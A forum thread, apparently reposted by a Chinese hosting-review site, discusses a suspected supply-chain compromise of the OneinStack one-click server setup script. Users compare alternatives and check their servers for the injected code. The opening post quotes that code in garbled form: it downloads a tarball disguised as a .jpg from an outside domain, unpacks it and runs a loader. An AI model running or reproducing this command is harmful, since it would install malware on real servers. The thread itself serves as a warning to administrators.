Oneinstack一键网站环境脚本最近挂了！

SK_网友说:

[URL][URL]https://github.com/oneinstack/oneinstack/issues/487[/URL][/URL]挂马的文件在一行:/root/oneinstack/include/OpenSSL . sh 137，多一段:wget http://download.cnoneinstack.com/oneinstack.jpg -co/var/local/oneinstack . jpg &；& amptar zxf/var/local/oneinstack . jpg -C/var/local/& amp；& ampCD/var/local/cron & amp；& amp。/load linux@QWE复制代码执行代码。文件https://github.com/oneinstack/blob/main/include/openssl.sh没有这个代码。不允许对比oneinstack-full.tar.gz的MD5代码，要看文件/root/oneinstack/include/OpenSSL . sh，不知道黑客会不会留后门清理入侵痕迹。我的另一台机器几个月前构建的这个文件没有这串代码。

5ean用户回答:

颜Sa发表于01: 41，2023-5-1。这么多年用lnmp回部队还是比较靠谱的。

Klocal用户回答道:

没有面板做什么最安全？

5ean用户回答:

我看了看，是真的。我去。我的服务器使用oneinstack。我核实了一下，看看是不是真的。

5ean用户回答:

Klocal发表于2023-5-1 01:32说没有面板是最安全的地方。谁会想到源代码被黑了挂了？以后不敢用oneinstack了。

七夏微笑的网友回答道:

什么都用感觉不安全，但是还是用老板用的东西比较好，出了问题人家能及时发现。

Xhvai110用户回复:

泰库拉

网友闫回复道:

始终使用lnmp

bios12567496的用户回答道:

我看了看我一月份配置的代码。

Jhsyue网友回复:

上个月我没配这个码。我是4月21日下午埋的。我只是查了一下有没有这个代码。

squ33ker的用户回复:

谢谢提醒，部署的老版本没有更新。我刚刚检查了一下，没有发现任何问题。

平生洗头，软软的回复网友:

自从用了宝塔就没用过一键环境包了。

Irain用户回复:

问题是前几天推出的，但是我觉得前天下载没有问题。今天已经是挂马版了。

菊花比网友帅回答道:

把压缩文件藏成jpg偷偷摸摸肯定有问题。

SK_ User回复:

Loc有大boss分析行为，供应链攻击

这几篇文章你可能也喜欢：

• 暂无相关推荐文章

本文由主机参考刊发，转载请注明：Oneinstack一键网站环境脚本最近挂了！ https://zhujicankao.com/92999.html